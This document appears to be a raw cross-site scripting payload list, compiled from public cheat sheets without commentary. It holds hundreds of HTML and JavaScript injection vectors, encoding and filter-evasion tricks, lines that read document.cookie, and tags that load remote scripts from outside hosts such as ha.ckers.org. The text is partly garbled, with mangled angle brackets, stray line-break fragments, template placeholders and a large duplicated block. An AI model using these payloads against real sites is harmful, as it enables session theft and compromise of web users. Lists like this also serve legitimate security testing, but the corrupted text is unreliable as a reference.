_xml id="xss" src="%(htc)s"__/xml_ _label dataformatas="html" datasrc="#xss" datafld="payload"__/label_
_event-source src="%(event)s" onload="javascript:alert(1)"_
_a href="javascript:javascript:alert(1)"__event-sourc- e src="data:application/x-dom-event-stream,Event:click%0A- data:XXX%0A%0A"_
_div id="x"_x_/div_ _xml:namespace prefix="t"_ _import namespace="t" implementation="#default#time2"_ _t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror- ;=javascript:alert(1)>"_
_script_%(payload)s_/script_
_script src=%(jscript)s__/script_
_script language='javascript' src='%(jscript)s'__/script_
_script_javascript:alert(1)_/script_
_IMG SRC="javascript:javascript:alert(1);"_
_IMG SRC=javascript:javascript:alert(1)_
_IMG SRC=`javascript:javascript:alert(1)`_
_SCRIPT SRC=%(jscript)s?_B_
_FRAMESET__FRAME SRC="javascript:javascript:alert(1);"__/FRAMESET_<- br />
_BODY ONLOAD=javascript:alert(1)_
_BODY ONLOAD=javascript:javascript:alert(1)_
_IMG SRC="jav ascript:javascript:alert(1);"_
_BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)_
_SCRIPT/SRC="%(jscript)s"__/SCRIPT_
__SCRIPT_%(payload)s//__/SCRIPT_
_IMG SRC="javascript:javascript:alert(1)"
_iframe src=%(scriptlet)s _
_INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"_
_IMG DYNSRC="javascript:javascript:alert(1)"_
_IMG LOWSRC="javascript:javascript:alert(1)"_
_BGSOUND SRC="javascript:javascript:alert(1);"_
_BR SIZE="&{javascript:alert(1)}"_
_LAYER SRC="%(scriptlet)s"__/LAYER_
_LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"_
_STYLE_@import'%(css)s';_/STYLE_
_META HTTP-EQUIV="Link" Content="_%(css)s_; REL=stylesheet"_
_XSS STYLE="behavior: url(%(htc)s);"_
_STYLE_li {list-style-image: url("javascript:javascript:alert(1)");}_/STYLE__UL- __LI_XSS
_META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"_r />
_META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"_
_IFRAME SRC="javascript:javascript:alert(1);"__/IFRAME_
_TABLE BACKGROUND="javascript:javascript:alert(1)"_
_TABLE__TD BACKGROUND="javascript:javascript:alert(1)"_
_DIV STYLE="background-image: url(javascript:javascript:alert(1))"_
_DIV STYLE="width:expression(javascript:alert(1));"_
_IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"- _
_XSS STYLE="xss:expression(javascript:alert(1))"_
_STYLE TYPE="text/javascript"_javascript:alert(1);_/STYLE- _
_STYLE_.XSS{background-image:url("javascript:javasc- ript:alert(1)");}_/STYLE__A CLASS=XSS__/A_
_STYLE type="text/css"_BODY{background:url("javascri- pt:javascript:alert(1)")}_/STYLE_
_!--[if gte IE 4]__SCRIPT_javascript:alert(1);_/SCRIPT__![endif]--_
_BASE HREF="javascript:javascript:alert(1);//"_
_OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"__/OBJECT_
_OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389__param name=url value=javascript:javascript:alert(1)__/OBJECT_
_HTML xmlns:xss__?import namespace="xss" implementation="%(htc)s"__xss:xss_XSS_/xss:xss__/H- TML_""","XML namespace."),("""_XML ID="xss"__I__B_<IMG SRC="javas_!-- --_cript:javascript:alert(1)">_/B__/I__/XML__SPA- N DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"__/SPAN_
_HTML__BODY__?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"__?import namespace="t" implementation="#default#time2"__t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"- ;__/BODY__/HTML_
_SCRIPT SRC="%(jpg)s"__/SCRIPT_
_HEAD__META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"_ _/HEAD_+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
_form id="test" /__button form="test" formaction="javascript:javascript:alert(1)"_X
_body onscroll=javascript:alert(1)__br__br__br__br__br__br__br__br- __br__br__br__br__br__br__br__br__br__br__br__br__br__br__br- __br__br__br__br__br__br__br__br__br__br__br__br__br__br__br- __br__br__input autofocus_
_P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"_
_STYLE_@import'%(css)s';_/STYLE_
_STYLE_a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}_/STYLE_
_meta charset= "x-imap4-modified-utf7"&&_&&_scrip- t&&_javascript:alert(1)&&;&&_&&a- mp;/script&&_
_SCRIPT onreadystatechange=javascript:javascript:alert(1);__/SCRIPT_-
_style onreadystatechange=javascript:javascript:alert(1);__/style_<- br />
_?xml version="1.0"?__html:html xmlns:html='http://www.w3.org/1999/xhtml'__html:script_javas- cript:alert(1);_/html:script__/html:html_
_embed code=%(scriptlet)s__/embed_
_embed code=javascript:javascript:alert(1);__/embed_
_embed src=%(jscript)s__/embed_
_frameset onload=javascript:javascript:alert(1)__/frameset_
_object onerror=javascript:javascript:alert(1)_
_embed type="image" src=%(scriptlet)s__/embed_
_XML ID=I__X__C__![CDATA[_IMG SRC="javas]]_![CDATA[cript:javascript:alert(1);"_]- ]_/C__X__/xml_
_IMG SRC=&{javascript:alert(1);};_
_a href="javAascript:javascript:alert(1)"_test- 1_/a_
_a href="javaascript:javascript:alert(1)"_test- 1_/a_
_embed width=500 height=500 code="data:text/html,_script_%(payload)s_/script_"- __/embed_
_iframe srcdoc="<iframe/srcdoc=&lt;img&a- mp;sol;src=&apos;&apos;onerror=javascript:al- ert(1)&gt;_"_
';alert(String.fromCharCode(88,83,83))//';alert(String.f- romCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(Strin- g.fromCharCode(88,83,83))//--
__/SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88,- 83,83))_/SCRIPT_
'';!--"_XSS_=&{()}
_SCRIPT SRC=http://ha.ckers.org/xss.js__/SCRIPT_
_IMG SRC="javascript:alert('XSS');"_
_IMG SRC=javascript:alert('XSS')_
_IMG SRC=JaVaScRiPt:alert('XSS')_
_IMG SRC=javascript:alert("XSS")_
_IMG SRC=`javascript:alert("RSnake says, 'XSS'")`_
_a onmouseover="alert(document.cookie)"_xxs link_/a_
_a onmouseover=alert(document.cookie)_xxs link_/a_
_IMG """__SCRIPT_alert("XSS")_/SCRIPT_&q- uot;_
_IMG SRC=javascript:alert(String.fromCharCode(88,83,83))_
_IMG SRC=# onmouseover="alert('xxs')"_
_IMG SRC= onmouseover="alert('xxs')"_
_IMG onmouseover="alert('xxs')"_
_IMG SRC=javasc- ;ript:a&- amp;#108;ert('&am- p;#88;SS')_
_IMG SRC=java&- ;#0000115cri- 2t:al�- 000101rt('&a- mp;#0000088SS'�- 041_
_IMG SRC=javasc&a- mp;#x72ipt:a- Cert('X&- #x53S')_
_IMG SRC="jav ascript:alert('XSS');"_
_IMG SRC="jav	ascript:alert('XSS');"_
_IMG SRC="jav
ascript:alert('XSS');"_
_IMG SRC="jav
ascript:alert('XSS');"_
perl -e 'print "_IMG SRC=java\0script:alert(\"XSS\")_";' _ out
_IMG SRC="  javascript:alert('XSS');"_
_SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")_<- br />
_SCRIPT/SRC="http://ha.ckers.org/xss.js"__/SCR- IPT_
__SCRIPT_alert("XSS");//__/SCRIPT_
_SCRIPT SRC=http://ha.ckers.org/xss.js?_ B _
_SCRIPT SRC=//ha.ckers.org/.j_
_IMG SRC="javascript:alert('XSS')"
_iframe src=http://ha.ckers.org/scriptlet.html _
\";alert('XSS');//
_/TITLE__SCRIPT_alert("XSS");_/SCRIPT_
_INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"_
_BODY BACKGROUND="javascript:alert('XSS')"_
_IMG DYNSRC="javascript:alert('XSS')"_
_IMG LOWSRC="javascript:alert('XSS')"_
_STYLE_li {list-style-image: url("javascript:alert('XSS')");}_/STYLE__UL__LI_XS- S_/br_
_IMG SRC='vbscript:msgbox("XSS")'_
_IMG SRC="livescript:[code]"_
_BODY ONLOAD=alert('XSS')_
_BGSOUND SRC="javascript:alert('XSS');"_
_BR SIZE="&{alert('XSS')}"_
_LINK REL="stylesheet" HREF="javascript:alert('XSS');"_
_LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"_
_STYLE_@import'http://ha.ckers.org/xss.css';_/STYLE_
_META HTTP-EQUIV="Link" Content="_http://ha.ckers.org/xss.css_; REL=stylesheet"_
_STYLE_BODY{-moz-binding:url("http://ha.ckers.org/x- ssmoz.xml#xss")}_/STYLE_
_STYLE_@im\port'\ja\vasc\ript:alert("XSS")';_/- STYLE_
_IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"_
exp/*_A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pres- sion(alert("XSS"))'_
_STYLE TYPE="text/javascript"_alert('XSS');_/STYLE_
_STYLE_.XSS{background-image:url("javascript:alert(- 'XSS')");}_/STYLE__A CLASS=XSS__/A_
_STYLE type="text/css"_BODY{background:url("javascri- pt:alert('XSS')")}_/STYLE_
_STYLE type="text/css"_BODY{background:url("javascri- pt:alert('XSS')")}_/STYLE_
_XSS STYLE="xss:expression(alert('XSS'))"_
_XSS STYLE="behavior: url(xss.htc);"_
¼script¾alert(¢XSS¢)¼/script¾
_META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"_
_META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"_
_META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"_
_IFRAME SRC="javascript:alert('XSS');"__/IFRAME_
_IFRAME SRC=# onmouseover="alert(document.cookie)"__/IFRAME_
_FRAMESET__FRAME SRC="javascript:alert('XSS');"__/FRAMESET_
_TABLE BACKGROUND="javascript:alert('XSS')"_
_TABLE__TD BACKGROUND="javascript:alert('XSS')"_
_DIV STYLE="background-image: url(javascript:alert('XSS'))"_
_DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061- \0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065- \0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"_r />
_DIV STYLE="background-image: url(javascript:alert('XSS'))"_
_DIV STYLE="width: expression(alert('XSS'));"_
_BASE HREF="javascript:alert('XSS');//"_
_OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"__/OBJECT- _
_EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0- dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My- 5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5- L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhl- aWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxl- cnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"__/EMBED_
_SCRIPT SRC="http://ha.ckers.org/xss.jpg"__/SCRIPT_
_!--#exec cmd="/bin/echo '_SCR'"--__!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js__/SCRIPT_'"--_
_? echo('_SCR)';echo('IPT_alert("XSS")_/SCRIPT_'); ?_
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
_META HTTP-EQUIV="Set-Cookie" Content="USERID=_SCRIPT_alert('XSS')_/SCRIPT_"_
_HEAD__META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"_ _/HEAD_+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
_SCRIPT a="_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT ="_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_" '' SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT "a='_'" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a=`_` SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_'_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT_document.write("_SCRI");_/SCRIPT_PT SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_A HREF="http://66.102.7.147/"_XSS_/A_
_A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D- "_XSS_/A_
_A HREF="http://1113982867/"_XSS_/A_
_A HREF="http://0x42.0x0000066.0x7.0x93/"_XSS_/A_
_A HREF="http://0102.0146.0007.00000223/"_XSS_/A_
_A HREF="htt p://6 6.000146.0x7.147/"_XSS_/A_
_iframe %00 src="	javascript:prompt(1)	"%00_r />
_svg__style_{font-family:'_iframe/onload=confi- rm(1)_'
_input/onmouseover="javaSCRIPT:confirm&am- p;lpar;1)"
_sVg__scRipt %00_alert(1) {Opera}
_img/src=`%00` onerror=this.onerror=confirm(1)
_form__isindex formaction="javascript:confirm(1)"
_img src=`%00`
 onerror=alert(1)

_script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	__/script_
_ScRipT 5-0*3+9/3=_prompt(1)_/ScRipT giveanswerhere=?
_iframe/src="data:text/html;	base64&Tab- ;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="_
_script /*%00*/_/*%00*/alert(1)/*%00*/_/script /*%00*/
">_h1/onmouseover='\u0061lert(1)'_%00
_iframe/src="data:text/html,_svg onload=alert(1)_"_
_meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/_
_svg__script xlink:href=data:,window.open('https://www.google.c- om/')__/script
_svg__script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
_meta http-equiv="refresh" content="0;url=javascript:confirm(1)"_
_iframe src=javascript:alert(document.- location)_
_form__a href="javascript:\u0061lert(1)"_- X
_/script__img/*%00/src="worksinchrome:pro- mpt(1)"/%00*/onerror='eval(src)'_
_img/	  src=`~` onerror=prompt(1)_
_form__iframe 	  src="javascript:alert(1)"
- ;	;_
_a href="data:application/x-x509-user-cert;
ba- se64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="- 	 _X_/a
http://www.google_script .com_alert(document.location)_/script
_a href=[�]"- ;� onmouseover=prompt(1)//"- ;_XYZ_/a
_img/src=@  onerror = prompt('1')
_style/onload=prompt('XSS- ;')
_script ^__^_alert(String.fromCharCode(49))_/script ^__^
_/style  __script   :-(_/**/alert(document.location)/**/_/script   :-(
�_/form__input type="date" onfocus="alert(1)"_
_form__textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)- '_
_script /***/_/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF- 11\u1450')/***/_/script /***/
_iframe srcdoc='<body onload=prompt(1)>'_
_a href="javascript:void(0)" onmouseover=
javascript:alert(1)
_X_- /a_
_script ~~~_alert(0%0)_/script ~~~_
_style/onload=<!--	> alert- (1)_
_///style///__span %2F onmousemove='alert(1)'_SPAN
_img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
">_svg__style_{-o-link-source:- '_body/onload=confirm(1)_'
_blink/ onmouseover=prompt(1)_OnMouseOver {Firefox & Opera}
_marquee onstart='javascript:alert(1)'_^__^
_div/style="width:expression(confirm(1))"_X_/d- iv_ {IE7}
_iframe/%00/ src=javaSCRIPT:alert(1)
//_form/action=javascript:alert(docume- nt.cookie)__input/type='submit'_//
/*iframe/src*/_iframe/src="_iframe/src=@"/onlo- ad=prompt(1) /*iframe/src*/_
//|\\ _script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'_ //|\\ _/script //|\\
_/font_/_svg__style_{src:'_style/onload=this.on- load=confirm(1)_'_/font_/_/style_
_a/href="javascript: javascript:prompt(1)"__input type="X"_
_/plaintext\__/|\__plaintext/onmouseover=prompt(1)
_/svg_''_svg__script 'AQuickBrownFoxJumpsOverTheLazyDog'_alert(1- 9; {Opera}
_a href="javascript:\u0061le%72- t(1)"__button_
_div onmouseover='alert(1)'_DIV_/div_
_iframe style="position:absolute;top:0;left:0;width:100%;height- :100%" onmouseover="prompt(1)"_
_a href="jAvAsCrIpT:alert(1)&q- uot;_X_/a_
_embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trun- k/misc/pdf/helloworld_js_X.pdf"_
_object data="http://corkami.googlecode.com/svn/!svn/bc/480/tru- nk/misc/pdf/helloworld_js_X.pdf"_
_var onmouseover="prompt(1)"_On Mouse Over_/var_
_a href=javascript:alert(document&period- ;cookie)_Click Here_/a_
_img src="/" =_=" title="onerror='prompt(1)'"_
_%_!--'%__script_alert(1);_/script --_
_script src="data:text/javascript,alert(1)"__/script_
_iframe/src \/\/onload = prompt(1)
_iframe/onreadystatechange=alert(1)
_svg/onload=alert(1)
_input value=___iframe/src=javascript:confirm(1)
_input type="text" value=`` _div/onmouseover='alert(1)'_X_/div_
http://www._script_alert(1)_/script .com
_iframe src=j
	a
		v- 
			a
&T- ab;			s
	&Ta- b;			c
	&Tab- ;				r
	- 						i&- NewLine;					&Ta- b;		p
		&Tab- ;						t&- ;NewLine;					&T- ab;				:a&NewL- ine;						&a- mp;Tab;				l
&am- p;Tab;						- 					e
&- amp;Tab;					&Ta- b;						r&am- p;NewLine;					&- Tab;						&a- mp;Tab;	t
			&am- p;Tab;						- 					28
- 						&T- ab;						&am- p;Tab;		1
		&- ;Tab;						&- amp;Tab;					&Ta- b;	%29__/iframe_
_svg__script ?_alert(1)
_iframe src=j	a	v	a	s	c&- Tab;r	i	p	t	:a	l&- ;Tab;e	r	t	%28	1	%29- __/iframe_
_img src=`xx:xx`onerror=alert(1)_
_object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "__/object_
_meta http-equiv="refresh" content="0;javascript:alert(1)"/_
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always_
_svg contentScriptType=text/vbs__script_MsgBox+1
_a href="data:text/html;base64_,_svg/onload=\u0061- C;e%72t(1)_"_X_/a
_iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u007- 4('\u0061') worksinIE_
_script_~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')_/script U+
_script/src="data:text%2Fj\u0061v\u0061sc- ript,\u0061lert('\u0061')"__/script a=\u0061 & /=%2F
_script/src=data:text/j\u0061v\u0061s&- amp;#99ript,\u0061%6C%65%72%- 74(/XSS/)__/script
_object data=javascript:\u0061le%72t(1)_<- br />
_script_+-+-1-+-+alert(1)_/script_
_body/onload=<!-->
alert(1)_
_script itworksinallbrowsers_/*_script* */alert(1)_/script
_img src ?itworksonchrome?\/onerror = alert(1)
_svg__script_//
confirm(1);_/script _/svg_
_svg__script onlypossibleinopera:-)_ alert(1)
_a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)_Click- Me
_script x_ alert(1) _/script 1=2
_div/onmouseover='alert(1)'_ style="x:"_
_--`_img/src=` onerror=alert(1)_ --!_
_script/src=data:text/&- ;#x6aavascr&- amp;#x69pt,al&- #x0065;rt(1)__/script_
_div style="position:absolute;top:0;left:0;width:100%;height- :100%" onmouseover="prompt(1)" onclick="alert(1)"_x_/button_
"__img src=x onerror=window.open('https://www.google.com/');_
_form__button formaction=javascript:alert(1)_CLICKME
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+__/ob- ject_
_iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%7- 2%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"__/iframe_
_a href="data:text/html;blabla,<sc&a- mp;#114ipt sr- c="http- ://ster- nefami- 08y.net/&#- 102oo.js"&- #62</scri&#- 112t>​"_Click Me_/a_
‘; alert(1);
‘)alert(1);//
_ScRiPt_alert(1)_/sCriPt_
_IMG SRC=jAVasCrIPt:alert(‘XSS’)_
_IMG SRC=”javascript:alert(‘XSS’);”_
_IMG SRC=javascript:alert("XSS")_
_IMG SRC=javascript:alert(‘XSS’)_
_img src=xss onerror=alert(1)_
_iframe %00 src="	javascript:prompt(1)	"%00_r />
_svg__style_{font-family:'_iframe/onload=confi- rm(1)_'
_input/onmouseover="javaSCRIPT:confirm&am- p;lpar;1)"
_sVg__scRipt %00_alert(1) {Opera}
_img/src=`%00` onerror=this.onerror=confirm(1)
_form__isindex formaction="javascript:confirm(1)"
_img src=`%00`
 onerror=alert(1)

_script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	__/script_
_ScRipT 5-0*3+9/3=_prompt(1)_/ScRipT giveanswerhere=?
_iframe/src="data:text/html;	base64&Tab- ;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="_
_script /*%00*/_/*%00*/alert(1)/*%00*/_/script /*%00*/
">_h1/onmouseover='\u0061lert(1)'_%00
_iframe/src="data:text/html,_svg onload=alert(1)_"_
_meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/_
_svg__script xlink:href=data:,window.open('https://www.google.c- om/')__/script
_svg__script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
_meta http-equiv="refresh" content="0;url=javascript:confirm(1)"_
_iframe src=javascript:alert(document.- location)_
_form__a href="javascript:\u0061lert(1)"_- X
_/script__img/*%00/src="worksinchrome:pro- mpt(1)"/%00*/onerror='eval(src)'_
_img/	  src=`~` onerror=prompt(1)_
_form__iframe 	  src="javascript:alert(1)"
- ;	;_
_a href="data:application/x-x509-user-cert;
ba- se64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="- 	 _X_/a
http://www.google_script .com_alert(document.location)_/script
_a href=[�]"- ;� onmouseover=prompt(1)//"- ;_XYZ_/a
_img/src=@  onerror = prompt('1')
_style/onload=prompt('XSS- ;')
_script ^__^_alert(String.fromCharCode(49))_/script ^__^
_/style  __script   :-(_/**/alert(document.location)/**/_/script   :-(
�_/form__input type="date" onfocus="alert(1)"_
_form__textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)- '_
_script /***/_/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF- 11\u1450')/***/_/script /***/
_iframe srcdoc='<body onload=prompt(1)>'_
_a href="javascript:void(0)" onmouseover=
javascript:alert(1)
_X_- /a_
_script ~~~_alert(0%0)_/script ~~~_
_style/onload=<!--	> alert- (1)_
_///style///__span %2F onmousemove='alert(1)'_SPAN
_img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
">_svg__style_{-o-link-source:- '_body/onload=confirm(1)_'
_blink/ onmouseover=prompt(1)_OnMouseOver {Firefox & Opera}
_marquee onstart='javascript:alert(1)'_^__^
_div/style="width:expression(confirm(1))"_X_/d- iv_ {IE7}
_iframe/%00/ src=javaSCRIPT:alert(1)
//_form/action=javascript:alert(docume- nt.cookie)__input/type='submit'_//
/*iframe/src*/_iframe/src="_iframe/src=@"/onlo- ad=prompt(1) /*iframe/src*/_
//|\\ _script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'_ //|\\ _/script //|\\
_/font_/_svg__style_{src:'_style/onload=this.on- load=confirm(1)_'_/font_/_/style_
_a/href="javascript: javascript:prompt(1)"__input type="X"_
_/plaintext\__/|\__plaintext/onmouseover=prompt(1)
_/svg_''_svg__script 'AQuickBrownFoxJumpsOverTheLazyDog'_alert(1- 9; {Opera}
_a href="javascript:\u0061le%72- t(1)"__button_
_div onmouseover='alert(1)'_DIV_/div_
_iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100- %" onmouseover="prompt(1)"_
_a href="jAvAsCrIpT:alert(1)&q- uot;_X_/a_
_embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trun- k/misc/pdf/helloworld_js_X.pdf"_
_object data="http://corkami.googlecode.com/svn/!svn/bc/480/tru- nk/misc/pdf/helloworld_js_X.pdf"_
_var onmouseover="prompt(1)"_On Mouse Over_/var_
_a href=javascript:alert(document&period- ;cookie)_Click Here_/a_
_img src="/" =_=" title="onerror='prompt(1)'"_
_%_!--'%__script_alert(1);_/script --_
_script src="data:text/javascript,alert(1)"__/script_
_iframe/src \/\/onload = prompt(1)
_iframe/onreadystatechange=alert(1)
_svg/onload=alert(1)
_input value=___iframe/src=javascript:confirm(1)
_input type="text" value=`` _div/onmouseover='alert(1)'_X_/div_
http://www._script_alert(1)_/script .com
_iframe src=j
	a
		v- 
			a
&T- ab;			s
	&Ta- b;			c
	&Tab- ;				r
	- 						i&- NewLine;					&Ta- b;		p
		&Tab- ;						t&- ;NewLine;					&T- ab;				:a&NewL- ine;						&a- mp;Tab;				l
&am- p;Tab;						- 					e
&- amp;Tab;					&Ta- b;						r&am- p;NewLine;					&- Tab;						&a- mp;Tab;	t
			&am- p;Tab;						- 					28
- 						&T- ab;						&am- p;Tab;		1
		&- ;Tab;						&- amp;Tab;					&Ta- b;	%29__/iframe_
_svg__script ?_alert(1)
_iframe src=j	a	v	a	s	c&- Tab;r	i	p	t	:a	l&- ;Tab;e	r	t	%28	1	%29- __/iframe_
_img src=`xx:xx`onerror=alert(1)_
_meta http-equiv="refresh" content="0;javascript:alert(1)"/_
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always_
_svg contentScriptType=text/vbs__script_MsgBox+1
_a href="data:text/html;base64_,_svg/onload=\u0061- C;e%72t(1)_"_X_/a
_iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u007- 4('\u0061') worksinIE_
_script_~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')_/script U+
_script/src="data:text%2Fj\u0061v\u0061sc- ript,\u0061lert('\u0061')"__/script a=\u0061 & /=%2F
_script/src=data:text/j\u0061v\u0061s&- amp;#99ript,\u0061%6C%65%72%- 74(/XSS/)__/script
_object data=javascript:\u0061le%72t(1)_<- br />
_script_+-+-1-+-+alert(1)_/script_
_body/onload=<!-->
alert(1)_
_script itworksinallbrowsers_/*_script* */alert(1)_/script
_img src ?itworksonchrome?\/onerror = alert(1)
_svg__script_//
confirm(1);_/script _/svg_
_svg__script onlypossibleinopera:-)_ alert(1)
_a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)_Click- Me
_script x_ alert(1) _/script 1=2
_div/onmouseover='alert(1)'_ style="x:"_
_--`_img/src=` onerror=alert(1)_ --!_
_script/src=data:text/- aavascr&- #x69pt,al�- 65;rt(1)__/script_
_div style="xg-p:absolute;top:0;left:0;width:100%;height:100- %" onmouseover="prompt(1)" onclick="alert(1)"_x_/button_
"__img src=x onerror=window.open('https://www.google.com/');_
_form__button formaction=javascript:alert(1)_CLICKME
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+__/ob- ject_
_iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%7- 2%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"__/iframe_
_a href="data:text/html;blabla,<sc&a- mp;#114ipt sr- c="http- ://ster- nefami- 08y.net/&#- 102oo.js"&- #62</scri&#- 112t>​"_Click Me_/a_
_SCRIPT_String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)_/SCRIPT_
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.f- romCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83- ))//”;alert(String.fromCharCode(88,83,83))//–__/SCRIPT_”_’__- SCRIPT_alert(String.fromCharCode(88,83,83))_/SCRIPT_
_IMG “””__SCRIPT_alert(“XSS”)_/SCRIPT_”_
_IMG SRC=javascript:alert(String.fromCharCode(88,83,83))_
_IMG SRC=”jav ascript:alert(‘XSS’);”_
_IMG SRC=”jav	ascript:alert(‘XSS’);”_
__SCRIPT_alert(“XSS”);//__/SCRIPT_
%253cscript%253ealert(1)%253c/script%253e
“__s”%2b”cript_alert(document.cookie)_/script_
foo_script_alert(1)_/script_
_scr_script_ipt_alert(1)_/scr_/script_ipt_
_IMG SRC=javasc- ;ript:a&- amp;#108;ert('&am- p;#88;SS')_
_IMG SRC=java&- ;#0000115cri- 2t:al�- 000101rt('&a- mp;#0000088SS'�- 041_
_IMG SRC=javasc&a- mp;#x72ipt:a- Cert('X&- #x53S')_
_BODY BACKGROUND=”javascript:alert(‘XSS’)”_
_BODY ONLOAD=alert(‘XSS’)_
_INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”_
_IMG SRC=”javascript:alert(‘XSS’)”
_iframe src=http://ha.ckers.org/scriptlet.html _
javascript:alert("hellox worldss")
_img src="javascript:alert('XSS');"_
_img src=javascript:alert("XSS")_
